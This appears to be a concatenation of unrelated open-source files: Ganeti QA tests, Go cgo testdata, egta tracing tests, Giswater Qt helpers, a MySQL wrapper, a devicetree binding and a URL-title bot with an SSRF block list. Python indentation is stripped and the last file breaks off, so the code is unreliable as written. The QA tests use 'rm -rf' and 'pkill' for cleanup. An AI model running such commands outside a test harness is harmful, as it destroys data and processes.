filestorage = qa_config.get("file-storage-dir",
pathutils.DEFAULT_FILE_STORAGE_DIR)
disk = os.path.join(filestorage, instance.name)
AssertCommand(["rm", "-rf", disk], node=snode)
def TestInstanceCreationRestrictedByDiskTemplates():
"""Test adding instances for disabled disk templates."""
if qa_config.TestEnabled("cluster-exclusive-storage"):
# These tests are valid only for non-exclusive storage
return
enabled_disk_templates = qa_config.GetEnabledDiskTemplates()
nodes = qa_config.AcquireManyNodes(2)
# Setup the cluster with the enabled_disk_templates
AssertCommand(
["gnt-cluster", "modify",
"--enabled-disk-templates=%s" % ",".join(enabled_disk_templates),
"--ipolicy-disk-templates=%s" % ",".join(enabled_disk_templates)],
fail=False)
# Test instance creation for enabled disk templates
for disk_template in enabled_disk_templates:
instance = CreateInstanceByDiskTemplate(nodes, disk_template, fail=False)
TestInstanceRemove(instance)
instance.Release()
# Test that instance creation fails for disabled disk templates
disabled_disk_templates = list(constants.DISK_TEMPLATES
- set(enabled_disk_templates))
for disk_template in disabled_disk_templates:
instance = CreateInstanceByDiskTemplate(nodes, disk_template, fail=True)
# Test instance creation for after disabling enabled disk templates
if (len(enabled_disk_templates) > 1):
# Partition the disk templates, enable them separately and check if the
# disabled ones cannot be used by instances.
middle = len(enabled_disk_templates) / 2
templates1 = enabled_disk_templates[:middle]
templates2 = enabled_disk_templates[middle:]
for (enabled, disabled) in [(templates1, templates2),
(templates2, templates1)]:
AssertCommand(["gnt-cluster", "modify",
"--enabled-disk-templates=%s" % ",".join(enabled),
"--ipolicy-disk-templates=%s" % ",".join(enabled)],
fail=False)
for disk_template in disabled:
CreateInstanceByDiskTemplate(nodes, disk_template, fail=True)
elif (len(enabled_disk_templates) == 1):
# If only one disk template is enabled in the QA config, we have to enable
# some other templates in order to test if the disabling the only enabled
# disk template prohibits creating instances of that template.
other_disk_templates = list(
set([constants.DT_DISKLESS, constants.DT_BLOCK]) -
set(enabled_disk_templates))
AssertCommand(["gnt-cluster", "modify",
"--enabled-disk-templates=%s" %
",".join(other_disk_templates),
"--ipolicy-disk-templates=%s" %
",".join(other_disk_templates)],
fail=False)
CreateInstanceByDiskTemplate(nodes, enabled_disk_templates[0], fail=True)
else:
raise qa_error.Error("Please enable at least one disk template"
" in your QA setup.")
# Restore initially enabled disk templates
AssertCommand(["gnt-cluster", "modify",
"--enabled-disk-templates=%s" %
",".join(enabled_disk_templates),
"--ipolicy-disk-templates=%s" %
",".join(enabled_disk_templates)],
fail=False)
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def _TestInstanceUserDown(instance, master, hv_shutdown_fn):
# Shutdown instance and bring instance status to 'USER_down'
hv_shutdown_fn()
cmd = ["gnt-instance", "list", "--no-headers", "-o", "status", instance.name]
result_output = qa_utils.GetCommandOutput(master.primary,
utils.ShellQuoteArgs(cmd))
AssertEqual(result_output.strip(), constants.INSTST_USERDOWN)
# Fail to bring instance status to 'running'
AssertCommand(["gnt-instance", "start", instance.name], fail=True)
cmd = ["gnt-instance", "list", "--no-headers", "-o", "status", instance.name]
result_output = qa_utils.GetCommandOutput(master.primary,
utils.ShellQuoteArgs(cmd))
AssertEqual(result_output.strip(), constants.INSTST_USERDOWN)
# Bring instance status to 'ADMIN_down'
AssertCommand(["gnt-instance", "shutdown", instance.name])
cmd = ["gnt-instance", "list", "--no-headers", "-o", "status", instance.name]
result_output = qa_utils.GetCommandOutput(master.primary,
utils.ShellQuoteArgs(cmd))
AssertEqual(result_output.strip(), constants.INSTST_ADMINDOWN)
# Bring instance status to 'running'
AssertCommand(["gnt-instance", "start", instance.name])
cmd = ["gnt-instance", "list", "--no-headers", "-o", "status", instance.name]
result_output = qa_utils.GetCommandOutput(master.primary,
utils.ShellQuoteArgs(cmd))
AssertEqual(result_output.strip(), constants.INSTST_RUNNING)
# Bring instance status to 'ADMIN_down' forcibly
AssertCommand(["gnt-instance", "shutdown", "-f", instance.name])
cmd = ["gnt-instance", "list", "--no-headers", "-o", "status", instance.name]
result_output = qa_utils.GetCommandOutput(master.primary,
utils.ShellQuoteArgs(cmd))
AssertEqual(result_output.strip(), constants.INSTST_ADMINDOWN)
# Bring instance status to 'running'
AssertCommand(["gnt-instance", "start", instance.name])
cmd = ["gnt-instance", "list", "--no-headers", "-o", "status", instance.name]
result_output = qa_utils.GetCommandOutput(master.primary,
utils.ShellQuoteArgs(cmd))
AssertEqual(result_output.strip(), constants.INSTST_RUNNING)
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def _TestInstanceUserDownXen(instance, master):
primary = _GetInstanceField(instance.name, "pnode")
fn = lambda: AssertCommand(["xm", "shutdown", "-w", instance.name],
node=primary)
_TestInstanceUserDown(instance, master, fn)
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def _TestInstanceUserDownKvm(instance, master):
def _StopKVMInstance():
AssertCommand("pkill -f \"kvm -name %s\"" % instance.name, node=primary)
time.sleep(5)
AssertCommand(["gnt-instance", "modify", "-H", "user_shutdown=true",
instance.name])
# The instance needs to reboot not because the 'user_shutdown'
# parameter was modified but because the KVM daemon need to be
# started, given that the instance was first created with user
# shutdown disabled.
AssertCommand(["gnt-instance", "reboot", instance.name])
primary = _GetInstanceField(instance.name, "pnode")
_TestInstanceUserDown(instance, master, _StopKVMInstance)
def TestInstanceUserDown(instance, master):
"""Tests user shutdown"""
enabled_hypervisors = qa_config.GetEnabledHypervisors()
for (hv, fn) in [(constants.HT_XEN_PVM, _TestInstanceUserDownXen),
(constants.HT_XEN_HVM, _TestInstanceUserDownXen),
(constants.HT_KVM, _TestInstanceUserDownKvm)]:
if hv in enabled_hypervisors:
fn(instance, master)
else:
print "%s hypervisor is not enabled, skipping test for this hypervisor" \
% hv
available_instance_tests = [
("instance-add-plain-disk", constants.DT_PLAIN,
TestInstanceAddWithPlainDisk, 1),
("instance-add-drbd-disk", constants.DT_DRBD8,
TestInstanceAddWithDrbdDisk, 2),
("instance-add-diskless", constants.DT_DISKLESS,
TestInstanceAddDiskless, 1),
("instance-add-file", constants.DT_FILE,
TestInstanceAddFile, 1),
("instance-add-shared-file", constants.DT_SHARED_FILE,
TestInstanceAddSharedFile, 1),
] | unknown | codeparrot/codeparrot-clean | ||
// Copyright 2020 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
//go:build ignore
package main
/*
typedef struct A A;
typedef struct {
struct A *next;
struct A **prev;
} N;
struct A
{
N n;
};
typedef struct B
{
A* a;
} B;
*/
import "C"
type N C.N
type A C.A
type B C.B | go | github | https://github.com/golang/go | src/cmd/cgo/internal/testgodefs/testdata/issue37479.go |
"""Test tracing"""
import asyncio
import numpy as np
import pytest
from gameanalysis import gamegen
from gameanalysis import paygame
from gameanalysis import rsgame
from egta import gamesched
from egta import innerloop
from egta import savesched
from egta import asyncgame
from egta import schedgame
from egta import trace
from test import utils # pylint: disable=wrong-import-order
def verify_complete_traces(traces):
"""Verify that traces are in order and complete"""
time = 0.0
for (first, *_, last), _ in traces:
assert first <= time
time = max(time, last)
assert time == 1.0
# These sometimes take a really long time because of at_least_one and many
# innerloops. If it takes more than a minute, just give up.
@pytest.mark.asyncio
@utils.timeout(20)
@pytest.mark.parametrize("base", utils.games())
async def test_random_trace_game(base):
"""Test tracing for random games"""
agame1 = asyncgame.wrap(gamegen.game_replace(base))
agame2 = asyncgame.wrap(gamegen.game_replace(base))
traces = await trace.trace_all_equilibria(agame1, agame2, style="one")
verify_complete_traces(traces)
# These sometimes take a really long time because of at_least_one and many
# innerloops. If it takes more than a minute, just give up.
@pytest.mark.asyncio
@utils.timeout(20)
@pytest.mark.parametrize("base", utils.games())
async def test_random_trace_sched(base):
"""Test tracing for random schedulers"""
sched1 = gamesched.gamesched(gamegen.game_replace(base))
sched2 = gamesched.gamesched(gamegen.game_replace(base))
traces = await trace.trace_all_equilibria(
schedgame.schedgame(sched1), schedgame.schedgame(sched2), style="one"
)
verify_complete_traces(traces)
@pytest.mark.asyncio
async def test_sparse_trace():
"""Test that tracing sparsely samples profiles"""
base = rsgame.empty(4, 3)
game1 = paygame.game_replace(
base, base.all_profiles(), (base.all_profiles() > 0) * [1, 0, 0]
)
game2 = paygame.game_replace(
base, base.all_profiles(), (base.all_profiles() > 0) * [-0.5, 1.5, 0]
)
save1 = savesched.savesched(gamesched.gamesched(game1))
save2 = savesched.savesched(gamesched.gamesched(game2))
sgame1 = schedgame.schedgame(save1)
sgame2 = schedgame.schedgame(save2)
await asyncio.gather(innerloop.inner_loop(sgame1), innerloop.inner_loop(sgame2))
# Assert that innerloop doesn't scheduler all profiles
assert save1.get_game().num_profiles == 11
assert save2.get_game().num_profiles == 11
((st1, *_, en1), _), (
(st2, *_, en2),
_,
) = await trace.trace_all_equilibria( # pylint: disable=too-many-star-expressions
sgame1, sgame2
)
# Assert that trace found the expected equilibria
assert np.isclose(st1, 0)
assert np.isclose(en1, 1 / 3, atol=1e-3)
assert np.isclose(st2, 1 / 3, atol=1e-3)
assert np.isclose(en2, 1)
# Assert that trace didn't need many extra profiles
assert save1.get_game().num_profiles == 12
assert save2.get_game().num_profiles == 12
@pytest.mark.asyncio
async def test_merge_trace():
"""Test that traces are merged"""
game0 = asyncgame.wrap(
paygame.game(2, 2, [[2, 0], [1, 1], [0, 2]], [[0, 0], [1, 1], [0, 0]])
)
game1 = asyncgame.wrap(
paygame.game(2, 2, [[2, 0], [1, 1], [0, 2]], [[0, 0], [1, 1], [0, 3]])
)
traces = await trace.trace_all_equilibria(game0, game1)
assert len(traces) == 1 | unknown | codeparrot/codeparrot-clean | ||
"""
This file is part of Giswater 3
The program is free software: you can redistribute it and/or modify it under the terms of the GNU
General Public License as published by the Free Software Foundation, either version 3 of the License,
or (at your option) any later version.
"""
# -*- coding: utf-8 -*-
""" Module with utility functions to interact with dialog and its widgets """
from qgis.gui import QgsDateTimeEdit
from qgis.PyQt.QtCore import QDate, QDateTime, QSortFilterProxyModel, QStringListModel, QTime, Qt, QRegExp
from qgis.PyQt.QtGui import QPixmap, QDoubleValidator, QRegExpValidator
from qgis.PyQt.QtWidgets import QLineEdit, QComboBox, QWidget, QDoubleSpinBox, QCheckBox, QLabel, QTextEdit, QDateEdit
from qgis.PyQt.QtWidgets import QAbstractItemView, QCompleter, QDateTimeEdit, QTableView, QSpinBox, QTimeEdit
from qgis.PyQt.QtWidgets import QPushButton, QPlainTextEdit, QRadioButton
from functools import partial
import os
import operator
from .actions.HyperLinkLabel import HyperLinkLabel
def fillComboBox(dialog, widget, rows, allow_nulls=True, clear_combo=True):
if rows is None:
return
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QComboBox, widget)
if clear_combo:
widget.clear()
if allow_nulls:
widget.addItem('')
for row in rows:
if len(row) > 1:
elem = row[0]
user_data = row[1]
else:
elem = row[0]
user_data = None
if elem is not None:
try:
if type(elem) is int or type(elem) is float:
widget.addItem(str(elem), user_data)
else:
widget.addItem(elem, user_data)
except:
widget.addItem(str(elem), user_data)
def fillComboBoxList(dialog, widget, list_object, allow_nulls=True, clear_combo=True):
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QComboBox, widget)
if widget is None:
return None
if clear_combo:
widget.clear()
if allow_nulls:
widget.addItem('')
for elem in list_object:
widget.addItem(str(elem))
def getText(dialog, widget, return_string_null=True):
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QWidget, widget)
if widget:
if type(widget) is QLineEdit or type(widget) is QPushButton or type(widget) is QLabel \
or type(widget) is HyperLinkLabel:
text = widget.text()
elif type(widget) is QDoubleSpinBox or type(widget) is QSpinBox:
text = widget.value()
elif type(widget) is QTextEdit:
text = widget.toPlainText()
if text:
elem_text = text
elif return_string_null:
elem_text = "null"
else:
elem_text = ""
else:
if return_string_null:
elem_text = "null"
else:
elem_text = ""
return elem_text
def setText(dialog, widget, text):
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QWidget, widget)
if not widget:
return
value = str(text)
if type(widget) is QLineEdit or type(widget) is QTextEdit or type(widget) is QLabel:
if value == 'None':
value = ""
widget.setText(value)
elif type(widget) is QPlainTextEdit:
if value == 'None':
value = ""
widget.insertPlainText(value)
elif type(widget) is QDoubleSpinBox or type(widget) is QSpinBox:
if value == 'None' or value == 'null':
value = 0
widget.setValue(float(value))
def getCalendarDate(dialog, widget, date_format="yyyy/MM/dd", datetime_format="yyyy/MM/dd hh:mm:ss"):
date = None
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QWidget, widget)
if not widget:
return
if type(widget) is QDateEdit:
date = widget.date().toString(date_format)
elif type(widget) is QDateTimeEdit:
date = widget.dateTime().toString(datetime_format)
elif type(widget) is QgsDateTimeEdit and widget.displayFormat() in ('dd/MM/yyyy', 'yyyy/MM/dd'):
date = widget.dateTime().toString(date_format)
elif type(widget) is QgsDateTimeEdit and widget.displayFormat() in ('dd/MM/yyyy hh:mm:ss', 'yyyy/MM/dd hh:mm:ss'):
date = widget.dateTime().toString(datetime_format)
return date
def setCalendarDate(dialog, widget, date, default_current_date=True):
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QWidget, widget)
if not widget:
return
if type(widget) is QDateEdit \
or (type(widget) is QgsDateTimeEdit and widget.displayFormat() in ('dd/MM/yyyy', 'yyyy/MM/dd')):
if date is None:
if default_current_date:
date = QDate.currentDate()
else:
date = QDate.fromString('01/01/2000', 'dd/MM/yyyy')
widget.setDate(date)
elif type(widget) is QDateTimeEdit \
or (type(widget) is QgsDateTimeEdit and widget.displayFormat() in ('dd/MM/yyyy hh:mm:ss', 'yyyy/MM/dd hh:mm:ss')):
if date is None:
date = QDateTime.currentDateTime()
widget.setDateTime(date)
def setTimeEdit(dialog, widget, time):
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QWidget, widget)
if not widget:
return
if type(widget) is QTimeEdit:
if time is None:
time = QTime(00, 00, 00)
widget.setTime(time)
def getWidget(dialog, widget):
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QWidget, widget)
if not widget:
return None
return widget
def getWidgetType(dialog, widget):
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QWidget, widget)
if not widget:
return None
return type(widget)
def getWidgetText(dialog, widget, add_quote=False, return_string_null=True):
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QWidget, widget)
if not widget:
return None
text = None
if type(widget) is QLineEdit or type(widget) is QTextEdit or type(widget) is QLabel or type(widget) is HyperLinkLabel \
or type(widget) is QSpinBox or type(widget) is QDoubleSpinBox or type(widget) is QPushButton:
text = getText(dialog, widget, return_string_null)
elif type(widget) is QComboBox:
text = getSelectedItem(dialog, widget, return_string_null)
if add_quote and text != "null":
text = "'"+text+"'"
return text
def setWidgetText(dialog, widget, text):
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QWidget, widget)
if not widget:
return
if type(widget) is QLineEdit or type(widget) is QTextEdit or type(widget) is QTimeEdit or type(widget) is QLabel \
or type(widget) is QPlainTextEdit:
setText(dialog, widget, text)
elif type(widget) is QDoubleSpinBox or type(widget) is QSpinBox:
setText(dialog, widget, text)
elif type(widget) is QComboBox:
setSelectedItem(dialog, widget, text)
elif type(widget) is QCheckBox:
setChecked(dialog, widget, text)
def isChecked(dialog, widget):
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QCheckBox, widget)
checked = False
if widget:
checked = widget.isChecked()
return checked
def setChecked(dialog, widget, checked=True):
if str(checked) in ('true', 't', 'True'):
checked = True
elif str(checked) in ('false', 'f', 'False'):
checked = False
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QWidget, widget)
if not widget:
return
if type(widget) is QCheckBox or type(widget) is QRadioButton:
widget.setChecked(bool(checked))
def getSelectedItem(dialog, widget, return_string_null=True):
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QComboBox, widget)
if return_string_null:
widget_text = "null"
else:
widget_text = ""
if widget:
if widget.currentText():
widget_text = widget.currentText()
return widget_text
def setSelectedItem(dialog, widget, text):
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QComboBox, widget)
if widget:
index = widget.findText(text)
if index == -1:
index = 0
widget.setCurrentIndex(index)
def setCurrentIndex(dialog, widget, index):
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QComboBox, widget)
if widget:
if index == -1:
index = 0
widget.setCurrentIndex(index);
def setWidgetVisible(dialog, widget, visible=True):
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QWidget, widget)
if widget:
widget.setVisible(visible)
def setWidgetEnabled(dialog, widget, enabled=True):
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QWidget, widget)
if widget:
widget.setEnabled(enabled)
def setImage(dialog, widget,cat_shape):
""" Set pictures for UD"""
element = cat_shape.lower()
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QWidget, widget)
if not widget:
return
if type(widget) is QLabel:
plugin_dir = os.path.dirname(__file__)
pic_file = os.path.join(plugin_dir, 'png', ''+element+'')
pixmap = QPixmap(pic_file)
widget.setPixmap(pixmap)
widget.show()
def fillWidget(dialog, widget, row):
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QWidget, widget)
if not widget:
return
key = widget.objectName()
if key in row:
if row[key] is not None:
value = str(row[key])
if type(widget) is QLineEdit or type(widget) is QTextEdit:
if value == 'None':
value = ""
widget.setText(value)
else:
widget.setText("")
else:
widget.setText("")
def set_table_selection_behavior(dialog, widget):
""" Set selection behavior of @widget """
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QWidget, widget)
if not widget:
return
widget.setSelectionBehavior(QAbstractItemView.SelectRows)
def set_autocompleter(combobox, list_items=None):
""" Iterate over the items in the QCombobox, create a list,
create the model, and set the model according to the list
"""
if list_items is None:
list_items = [combobox.itemText(i) for i in range(combobox.count())]
proxy_model = QSortFilterProxyModel()
set_model_by_list(list_items, combobox, proxy_model)
combobox.editTextChanged.connect(partial(filter_by_list, combobox, proxy_model))
def filter_by_list(widget, proxy_model):
""" Create the model """
proxy_model.setFilterFixedString(widget.currentText())
def set_model_by_list(string_list, widget, proxy_model):
""" Set the model according to the list """
model = QStringListModel()
model.setStringList(string_list)
proxy_model.setSourceModel(model)
proxy_model.setFilterKeyColumn(0)
proxy_model_aux = QSortFilterProxyModel()
proxy_model_aux.setSourceModel(model)
proxy_model_aux.setFilterKeyColumn(0)
widget.setModel(proxy_model_aux)
widget.setModelColumn(0)
completer = QCompleter()
completer.setModel(proxy_model)
completer.setCompletionColumn(0)
completer.setCompletionMode(QCompleter.UnfilteredPopupCompletion)
widget.setCompleter(completer)
def get_item_data(dialog, widget, index=0, add_quote=False):
""" Get item data of current index of the @widget """
code = -1
if add_quote:
code = ''
if type(widget) is str or type(widget) is str:
widget = dialog.findChild(QWidget, widget)
if widget:
if type(widget) is QComboBox:
current_index = widget.currentIndex()
elem = widget.itemData(current_index)
if index == -1:
return elem
code = elem[index]
return code
def set_combo_itemData(combo, value, item1):
""" Set text to combobox populate with more than 1 item for row
@item1: element to compare
@item2: element to show
"""
for i in range(0, combo.count()):
elem = combo.itemData(i)
if value == str(elem[item1]):
combo.setCurrentIndex(i)
return True
return False
def set_item_data(combo, rows, index_to_show=0, combo_clear=True, sort_combo=True, sort_by=1, add_empty=False):
""" Populate @combo with list @rows and show field @index_to_show
:param sort_by: sort combo by this element (column)
"""
records = []
if rows is None:
rows = [['', '']]
if sort_by > len(rows[0])-1:
sort_by = 1
for row in rows:
elem = []
for x in range(0, len(row)):
elem.append(row[x])
records.append(elem)
combo.blockSignals(True)
if combo_clear:
combo.clear()
records_sorted = records
try:
if sort_combo:
records_sorted = sorted(records, key=operator.itemgetter(sort_by))
except:
pass
finally:
if add_empty:
records_sorted.insert(0, ['', ''])
for record in records_sorted:
combo.addItem(record[index_to_show], record)
combo.blockSignals(False)
def set_combo_item_unselectable_by_id(qcombo, list_id=[]):
""" Make items of QComboBox visibles but not selectable"""
for x in range(0, qcombo.count()):
if x in list_id:
index = qcombo.model().index(x, 0)
qcombo.model().setData(index, 0, Qt.UserRole - 1)
def set_combo_item_selectable_by_id(qcombo, list_id=[]):
""" Make items of QComboBox selectable """
for x in range(0, qcombo.count()):
if x in list_id:
index = qcombo.model().index(x, 0)
qcombo.model().setData(index, (1 | 32), Qt.UserRole - 1)
def set_combo_item_select_unselectable(qcombo, list_id=[], column=0, opt=0):
""" Make items of QComboBox visibles but not selectable
:param qcombo: QComboBox widget to manage
:param list_id: list of strings to manage ex. ['1','3','...'] or ['word1', 'word3','...']
:param column: column where to look up the values in the list
:param opt: 0 to set item not selectable
:param opt: (1 | 32 ) to set item selectable
"""
for x in range(0, qcombo.count()):
elem = qcombo.itemData(x)
if str(elem[column]) in list_id:
index = qcombo.model().index(x, 0)
qcombo.model().setData(index, opt, Qt.UserRole - 1)
def remove_tab_by_tabName(tab_widget, tab_name):
""" Look in @tab_widget for a tab with @tab_name and remove it """
for x in range(0, tab_widget.count()):
if tab_widget.widget(x).objectName() == tab_name:
tab_widget.removeTab(x)
break
def enable_disable_tab_by_tabName(tab_widget, tab_name, action):
""" Look in @tab_widget for a tab with @tab_name and remove it """
for x in range(0, tab_widget.count()):
if tab_widget.widget(x).objectName() == tab_name:
tab_widget.setTabEnabled(x, action)
break
def double_validator(widget, min_=0, max_=999999, decimals=3, notation=QDoubleValidator().StandardNotation):
validator = QDoubleValidator(min_, max_, decimals)
validator.setNotation(notation)
widget.setValidator(validator)
def dis_enable_dialog(dialog, enable, ignore_widgets=['', None]):
widget_list = dialog.findChildren(QWidget)
for widget in widget_list:
if str(widget.objectName()) not in ignore_widgets:
if type(widget) in (QSpinBox, QDoubleSpinBox, QLineEdit):
widget.setReadOnly(not enable)
if enable:
widget.setStyleSheet("QWidget { background: rgb(255, 255, 255);"
" color: rgb(0, 0, 0)}")
else:
widget.setStyleSheet("QWidget { background: rgb(242, 242, 242);"
" color: rgb(100, 100, 100)}")
elif type(widget) in (QComboBox, QCheckBox, QPushButton, QgsDateTimeEdit, QTableView):
widget.setEnabled(enable)
def set_qtv_config(widget, selection=QAbstractItemView.SelectRows, edit_triggers=QTableView.NoEditTriggers):
""" Set QTableView configurations """
widget.setSelectionBehavior(selection)
widget.setEditTriggers(edit_triggers)
def get_col_index_by_col_name(qtable, column_name):
""" Return column index searching by column name """
column_index = False
for x in range(0, qtable.model().columnCount()):
if qtable.model().headerData(x, Qt.Horizontal) == column_name:
column_index = x
break
return column_index
def set_regexp_date_validator(widget, button=None, regex_type=1):
""" Set QRegExpression in order to validate QLineEdit(widget) field type date.
Also allow to enable or disable a QPushButton(button), like typical accept button
@Type=1 (yyy-mm-dd), @Type=2 (dd-mm-yyyy)
"""
placeholder = "yyyy-mm-dd"
if regex_type == 1:
widget.setPlaceholderText("yyyy-mm-dd")
placeholder = "yyyy-mm-dd"
reg_exp = QRegExp("(((\d{4})([-])(0[13578]|10|12)([-])(0[1-9]|[12][0-9]|3[01]))|"
"((\d{4})([-])(0[469]|11)([-])([0][1-9]|[12][0-9]|30))|"
"((\d{4})([-])(02)([-])(0[1-9]|1[0-9]|2[0-8]))|"
"(([02468][048]00)([-])(02)([-])(29))|"
"(([13579][26]00)([-])(02)([-])(29))|"
"(([0-9][0-9][0][48])([-])(02)([-])(29))|"
"(([0-9][0-9][2468][048])([-])(02)([-])(29))|"
"(([0-9][0-9][13579][26])([-])(02)([-])(29)))")
elif regex_type == 2:
widget.setPlaceholderText("dd-mm-yyyy")
placeholder = "dd-mm-yyyy"
reg_exp = QRegExp("(((0[1-9]|[12][0-9]|3[01])([-])(0[13578]|10|12)([-])(\d{4}))|"
"(([0][1-9]|[12][0-9]|30)([-])(0[469]|11)([-])(\d{4}))|"
"((0[1-9]|1[0-9]|2[0-8])([-])(02)([-])(\d{4}))|"
"((29)(-)(02)([-])([02468][048]00))|"
"((29)([-])(02)([-])([13579][26]00))|"
"((29)([-])(02)([-])([0-9][0-9][0][48]))|"
"((29)([-])(02)([-])([0-9][0-9][2468][048]))|"
"((29)([-])(02)([-])([0-9][0-9][13579][26])))")
widget.setValidator(QRegExpValidator(reg_exp))
widget.textChanged.connect(partial(eval_regex, widget, reg_exp, button, placeholder))
def eval_regex(widget, reg_exp, button, placeholder, text):
is_valid = False
if reg_exp.exactMatch(text) is True:
widget.setStyleSheet("border: 1px solid gray")
is_valid = True
elif str(text) == '':
widget.setStyleSheet("border: 1px solid gray")
widget.setPlaceholderText(placeholder)
is_valid = True
elif reg_exp.exactMatch(text) is False:
widget.setStyleSheet("border: 1px solid red")
is_valid = False
if button is not None and type(button) == QPushButton:
if is_valid is False:
button.setEnabled(False)
else:
button.setEnabled(True) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
#encoding:utf8
import json
import time,random
import datetime
import MySQLdb
import MySQLdb.cursors
class DB:
conn = None
db = None
host = None
def __init__(self, host, mysql_user, mysql_pass, mysql_db):
self.host = host
self.mysql_user = mysql_user
self.mysql_pass = mysql_pass
self.mysql_db = mysql_db
def connect(self):
self.conn = MySQLdb.connect(host=self.host, user=self.mysql_user, passwd=self.mysql_pass, db=self.mysql_db, charset="utf8", connect_timeout=600, compress=True,cursorclass = MySQLdb.cursors.DictCursor)
self.conn.autocommit(True)
def execute(self, sql):
try:
cursor = self.conn.cursor()
cursor.execute(sql)
except (AttributeError, MySQLdb.OperationalError):
try:
cursor.close()
self.conn.close()
except:
pass
time.sleep(1)
try:
self.connect()
print "reconnect DB"
cursor = self.conn.cursor()
cursor.execute(sql)
except (AttributeError, MySQLdb.OperationalError):
time.sleep(2)
self.connect()
print "reconnect DB"
cursor = self.conn.cursor()
cursor.execute(sql)
return cursor | unknown | codeparrot/codeparrot-clean | ||
# SPDX-License-Identifier: GPL-2.0-only OR BSD-2-Clause
%YAML 1.2
---
$id: http://devicetree.org/schemas/arm/cix.yaml#
$schema: http://devicetree.org/meta-schemas/core.yaml#
title: CIX platforms
maintainers:
- Peter Chen <peter.chen@cixtech.com>
- Fugang Duan <fugang.duan@cixtech.com>
properties:
$nodename:
const: '/'
compatible:
oneOf:
- description: Sky1 based boards
items:
- enum:
- radxa,orion-o6 # Radxa Orion O6 board
- xunlong,orangepi-6-plus # Xunlong orangepi 6 plus board
- const: cix,sky1
additionalProperties: true
... | unknown | github | https://github.com/torvalds/linux | Documentation/devicetree/bindings/arm/cix.yaml |
# -*- coding: utf-8 -*-
from twisted.spread import pb
from twisted.internet import endpoints, task, defer
from os import environ
import functools
import treq
import lxml.html
import re
import Levenshtein
from urllib import parse as urlparse
import json
import sqlite3
import codecs
import simple_eval
import ipaddress
from twisted.logger import textFileLogObserver, globalLogPublisher, Logger
log = Logger()
class AppException(Exception):
pass
BLOCKLIST = [
ipaddress.IPv4Network('127.0.0.0/8'),
ipaddress.IPv4Network('192.168.0.0/16'),
ipaddress.IPv4Network('10.0.0.0/8'),
ipaddress.IPv4Network('172.16.0.0/12'),
ipaddress.IPv6Network('::1'),
ipaddress.IPv6Network('fe80::/10'),
]
config = {}
def acceptable_netloc(hostname):
try:
address = ipaddress.ip_address(hostname)
except ValueError:
if hostname == "localhost":
return False
else:
return True
else:
for network in BLOCKLIST:
if address in network:
return False
else:
return True
class UrlHandler(object):
TIMEOUT = 30
def __init__(self, max_body, parser_class,
accepted_mimes=("text/html",),
headers={"Accept-Language": "en-US",
"User-Agent": ("nanobot title fetching, contacts to"
"http://github.com/nanonyme/nanobot")
}):
self.max_body = max_body
self.bytes = 0
self.parser_class = parser_class
self.parser = None
self.accepted_mimes = accepted_mimes
self.headers = headers
def feed(self, data):
if self.bytes < self.max_body:
if len(data) > self.max_body - self.bytes:
data = data[:self.max_body - self.bytes]
data_len = len(data)
self.bytes += data_len
self.parser.feed(data)
else:
self.connection.cancel()
async def handle_response(self, response):
if response.code != 200:
raise AppException(f"Response code {response.code}")
try:
headers = response.headers.getRawHeaders("Content-Type")
except KeyError:
raise AppException("No Content-Type")
if not headers:
raise AppException("Empty Content-Type")
else:
header = headers[0]
log.info(f"Header line {header}")
mime, _, encoding = header.partition(";")
if encoding:
_, _, encoding = encoding.strip().partition("=")
try:
codecs.lookup(encoding)
except LookupError:
encoding = None
if mime not in self.accepted_mimes:
raise AppException(f"Mime {mime} not supported")
if encoding:
log.info(f"Using encoding {encoding} to handle response")
self.parser = self.parser_class()
await response.collect(self.feed)
return self.parser.close()
async def get_url(self, url):
return await treq.get(url, timeout=self.TIMEOUT, headers=self.headers)
async def get_title(self, url):
response = await self.get_url(url)
root = await self.handle_response(response)
title = root.xpath("//title")[0].text
if not title:
return ""
else:
return " ".join(title.split())
def difference_check(a, s):
if len(a) < 14 or len(s) < 14:
if len(a) != len(s):
return True
else:
return a != s
else:
return Levenshtein.distance(a, s) >= 7
def dynsearch(l, s):
a, b = l[0], l[1:]
if not b:
return difference_check(a, s)
else:
if not dynsearch(b, s):
return False
else:
return difference_check("".join(b), s)
def prepare_url(url):
path = urlparse.unquote(urlparse.urlparse(url).path).replace("-", "")
path = path.replace(" ", "").replace("+", "").replace("_", "").lower()
path = path.rstrip("0123456789")
return path.split("/")
def prepare_title(title):
title = title.replace("+", "").replace(" ", "").replace("_", "").lower()
return re.split("[-–]", title)[0]
class MessageHandler(object):
_URL_HANDLER_CLASS = UrlHandler
def __init__(self, reactor, hits, misses, callback, max_len):
self._reactor = reactor
self._hits = hits
self._misses = misses
self._max_len = max_len
self._callback = callback
async def success(self, title, url):
log.info(f"Got title {title}")
if dynsearch(prepare_url(url), prepare_title(title)):
log.info("Will try to send title as a message")
await self._callback("title: %s" % title)
await task.deferLater(self._reactor, 2, defer.succeed,
None)
def fail(self, url):
self._misses.update(url, "miss")
log.failure(f"Adding {url} to temporary block list")
async def find_links(self, message):
for m in re.finditer("(https?://[^ ]+)", message):
url = m.group(0)
